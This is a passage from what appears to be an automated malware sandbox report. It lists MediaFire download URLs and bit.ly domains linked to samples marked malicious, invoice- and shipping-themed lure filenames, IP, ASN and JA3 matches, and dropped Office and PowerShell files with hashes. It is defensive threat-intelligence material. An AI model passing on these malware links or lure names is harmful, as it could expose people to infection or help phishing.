                                                                                                                                                                      • www.mediafire.com/images/icons/myfiles/default.png
                                                                                                                                                                      http://download1716.mediafire.com/4ovq1dagh3qg/llznllwcu118fj5/New+Order.tgzGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/images/icons/myfiles/default.png
                                                                                                                                                                      http://www.mediafire.com/file/4xm9i7c25z2wtqj/Parsel+Detaylar%C4%B1.7z/fileGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/file/4xm9i7c25z2wtqj/Parsel+Detaylar%C4%B1.7z/file
                                                                                                                                                                      https://download1580.mediafire.com/4xprc4caulsg/qpuaxqx0pdqcik8/Solicitud+de+presupuesto.7zGet hashmaliciousBrowse
                                                                                                                                                                      • static.mediafire.com/images/icons/dropdown-arrow-left-white.png
                                                                                                                                                                      https://download1582.mediafire.com/ntorjrq3jvwg/xpqdxdvhyo668qg/Android+WhatsApp+to+iPhone+Transfer+-+DU+x32.zipGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/images/icons/myfiles/default.png
                                                                                                                                                                      http://www.mediafire.com/file/69twv65ip7pnmit/Pago+de+septiembre.7z/fileGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/file/69twv65ip7pnmit/Pago+de+septiembre.7z/file
                                                                                                                                                                      http://download1525.mediafire.com/a2niozn5iheg/ayhephnsi8hnlgv/test.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/images/icons/myfiles/default.png
                                                                                                                                                                      http://www.mediafire.com/file/ibvjx6w8gmts4j5/fac102.7z/fileGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/file/ibvjx6w8gmts4j5/fac102.7z/file
                                                                                                                                                                      http://www.mediafire.com/file/pmniek5ga3pcbsn/fac898.7z/fileGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/file/pmniek5ga3pcbsn/fac898.7z/file
                                                                                                                                                                      http://download1091.mediafire.com/smswhhish79g/inavpzw4z2jvl03/origin_ovmQPU46.binGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/about/
                                                                                                                                                                      http://www.mediafire.com/file/cptu7ix4cmcf70x/XZFABN20GH.ISO/fileGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/file/cptu7ix4cmcf70x/XZFABN20GH.ISO/file
                                                                                                                                                                      http://www.mediafire.com/file/sit6rz2fkwwonyp/JUST71-003.7z/fileGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/file/sit6rz2fkwwonyp/JUST71-003.7z/file
                                                                                                                                                                      http://www.mediafire.com/file/0ycg9sjxupyh5rw/JUSTF2.7z/fileGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/file/0ycg9sjxupyh5rw/JUSTF2.7z/file
                                                                                                                                                                      http://www.mediafire.com/file/tkhmcila709n3du/JUSTIF.7z/fileGet hashmaliciousBrowse
                                                                                                                                                                      • www.mediafire.com/file/tkhmcila709n3du/JUSTIF.7z/file

                                                                                                                                                                      Domains

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      bit.lyInvoice Slide.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      PO 182782.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      #U266b Audio_3997.Inspiresleep.htmGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      Debbie Young.htmlGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      Jayden Krebs.htmlGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      Andrew Wells.htmlGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      T8778900.htmGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      Tuesday, January 11, 2022-ATT8778900.htmGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      dvrz5zV1ZT.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      szyQKudypa.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      V91yW08J6p.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      5ubL3m46Jq.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      d5a1I4eWgx.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      V_M 800649521January 10, 2022, 092617 AM ceiIpjvKkKpmJAgpSfGajHSDNeplAfaByLbvGPGjtvkkGPQvad.HTMGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      YX15E4KhPT.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      9tmonr75XX.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      yfBY6q7IfZ.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      15de7QKUqK.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      JpGWlFYijq.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      yeH1jagGNL.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      www.mediafire.comInvoice Slide.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      PO 182782.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      New Price List.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      New Price List.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      6.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      H5wKkYHgfH.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      QAy9Baa1GV.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      ATThRB6ogL.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      bH6ZSUyewU.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      ex0xqa4Mfb.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      aiX216jOU0.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      8H2QE5B4E2.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      1tmv8Rmof6.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      PH76KLVhVe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      tLhG5jGH69.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      UsjoKBshug.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      nkINykHreE.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      q6WL5h4w4J.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      30dLI6L66T.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      u5Xy31KyGy.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.203.237

                                                                                                                                                                      ASN

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      CLOUDFLARENETUSNova narudzba u prilogu.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.134.233
                                                                                                                                                                      Visual CertExam Suite_3.0.1.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.18.88.101
                                                                                                                                                                      urMpgNNXPM.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.21.38.221
                                                                                                                                                                      IhRNkXfMkBGet hashmaliciousBrowse
                                                                                                                                                                      • 172.64.209.6
                                                                                                                                                                      zmbGUZTICp.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.21.38.221
                                                                                                                                                                      DHLExpress.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 172.67.207.77
                                                                                                                                                                      wbzPLLs2JMGet hashmaliciousBrowse
                                                                                                                                                                      • 172.71.235.0
                                                                                                                                                                      Wigburg_CxyUDKM.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.133.233
                                                                                                                                                                      25oAqEsPvH.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.134.233
                                                                                                                                                                      commercial invoice_010202201.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                      tijXCZsbGe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.135.233
                                                                                                                                                                      gtA4WlXzTO.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.21.65.138
                                                                                                                                                                      20145639704.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.137.85
                                                                                                                                                                      2098765432345678909876543234567890987654.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.138.85
                                                                                                                                                                      FedEx_Shipping_Documents_009800.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.138.85
                                                                                                                                                                      HME AG PO 2091.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                      K5CrmTWqYm.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.133.233
                                                                                                                                                                      JBtjAS1TGq.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.129.233
                                                                                                                                                                      BzYdfSiOVH.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.23.98.190
                                                                                                                                                                      eIxMVDoQF3.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 162.159.133.233
                                                                                                                                                                      GOOGLE-PRIVATE-CLOUDUSInvoice Slide.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      PO 182782.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      #U266b Audio_3997.Inspiresleep.htmGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      S6im2ZDYxaGet hashmaliciousBrowse
                                                                                                                                                                      • 148.99.216.23
                                                                                                                                                                      Debbie Young.htmlGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      Jayden Krebs.htmlGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      8EjHURgogbGet hashmaliciousBrowse
                                                                                                                                                                      • 148.113.28.178
                                                                                                                                                                      Andrew Wells.htmlGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      T8778900.htmGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      Tuesday, January 11, 2022-ATT8778900.htmGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      dvrz5zV1ZT.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      szyQKudypa.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      V91yW08J6p.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      5ubL3m46Jq.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      d5a1I4eWgx.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      V_M 800649521January 10, 2022, 092617 AM ceiIpjvKkKpmJAgpSfGajHSDNeplAfaByLbvGPGjtvkkGPQvad.HTMGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.10
                                                                                                                                                                      YX15E4KhPT.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      9tmonr75XX.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      yfBY6q7IfZ.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11
                                                                                                                                                                      15de7QKUqK.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.199.248.11

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adVotre_Releve_Fiscal_Ameli.vbsGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      Visual CertExam Suite_3.0.1.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      SRF854698801.vbsGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      Wigburg_CxyUDKM.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      25oAqEsPvH.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      20145639704.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      2098765432345678909876543234567890987654.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      FedEx_Shipping_Documents_009800.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      K5CrmTWqYm.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      Invoice Slide.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      PO 182782.ppamGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      qyLAijGe7S.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      GP32t1WkPk.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      4nmeEJrZJ9.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      PO-98766.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      XY098765434567890987654567d4beYmQGc7ia9.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      gunzipped.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      tivDpdRokf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237
                                                                                                                                                                      Payment slip & Invoices.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 104.16.202.237
                                                                                                                                                                      • 142.250.186.129
                                                                                                                                                                      • 34.102.176.152
                                                                                                                                                                      • 199.91.155.3
                                                                                                                                                                      • 104.16.203.237

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8C01FE73-17BC-469B-9266-AF90E081EBE6
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):141109
                                                                                                                                                                      Entropy (8bit):5.356496584509331
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:icQIfgxrBdA3guwtnQ9DQW+zUk4F77nXmvidZXPE5LWmE9:K5Q9DQW+zwX8U
                                                                                                                                                                      MD5:600DD5C4D02EA05A698D8293B6BA7098
                                                                                                                                                                      SHA1:A6B107A575ECF83B5EE278757522098DA5B8AFE4
                                                                                                                                                                      SHA-256:749A7A2B7D557BFED52790EE5152D7AC866EAA05BBBEFF53CB2C63653546E0D0
                                                                                                                                                                      SHA-512:98870E76BF7B78D6B189D687E66891B9853193240F5F3D1938FFC1E12AB303FBBCF1301C04002AD2A163E4017BFCD923AC14C99B6851500E92F31592D02E5BBC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-01-14T11:19:27">.. Build: 16.0.14830.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):57895
                                                                                                                                                                      Entropy (8bit):5.076836667322206
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:YSh+jH0TtAHkjgCMrxYSNNhf2flJdmYoxi3j39MVvjmx96CaLMhiOpUpeZNUvqEv:jh+jH0TtAHkjDMrxYENhf2flJdmYoxio
                                                                                                                                                                      MD5:9A6798954EEE02F2957F26ACAC3EA8C7
                                                                                                                                                                      SHA1:BD0F8F6183D95A7F7E8FE7D1583B7636D0B941E2
                                                                                                                                                                      SHA-256:2D38ADA5062F63CBCAA44453FBC4CC73842F48CACC1225DE41E424EE3BC06CA0
                                                                                                                                                                      SHA-512:FCA3F3ECA8804C1667033E8BF4A8C340364C8BCE55A98F9974D8CF2C301AA96EAD183BB547A5CDD91680516652B30B8809D7015589DBE105C94B7A75F567FBD8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: PSMODULECACHE.X....Kf8...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet........yH.8...I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEach........Should........BeforeEach........Get-MockDynamicParameters........It........Assert-VerifiableMocks........BeforeAll........Context........Set-TestInconclusive........AfterAll........Setup........Set-DynamicParameterVariables........Invoke-Pester........Assert-MockCalled........New-PesterOption.........P.e...N...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository.......
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):0.9260988789684415
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                                                                                      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                                                                                      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                                                                                      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                                                                                      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: @...e................................................@..........
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):152056
                                                                                                                                                                      Entropy (8bit):4.414483777350781
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:fmmMLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3ow:fyg8WpFpKKHHedydFeo+oQLUlPow
                                                                                                                                                                      MD5:C38DBDB68E1687396E570A305461E96F
                                                                                                                                                                      SHA1:1D2491FD377C4338E9FE70853FBCD7F9C7BAC60D
                                                                                                                                                                      SHA-256:7D1AA51D101EC19951EA7E263928B530E89C11A468BC024FABBC2285A5EC672A
                                                                                                                                                                      SHA-512:4F6930507357BB2A27DE2D3A2B9ECD94F40A07BEBE1EA40A5268A6F0C8FFF8C1B373CD52ED3BA43CF0437E39F7A1FC4E6A1C2BCF4D422CFD5FF0883766E8C835
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......B...........^...............g...............W...............F..............<G...............g...............i...I..............T..................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aslmsvnf.ger.psm1
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdnca5x3.uvv.ps1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jde4l4rg.xur.ps1
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5ax1rj2.edq.psm1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
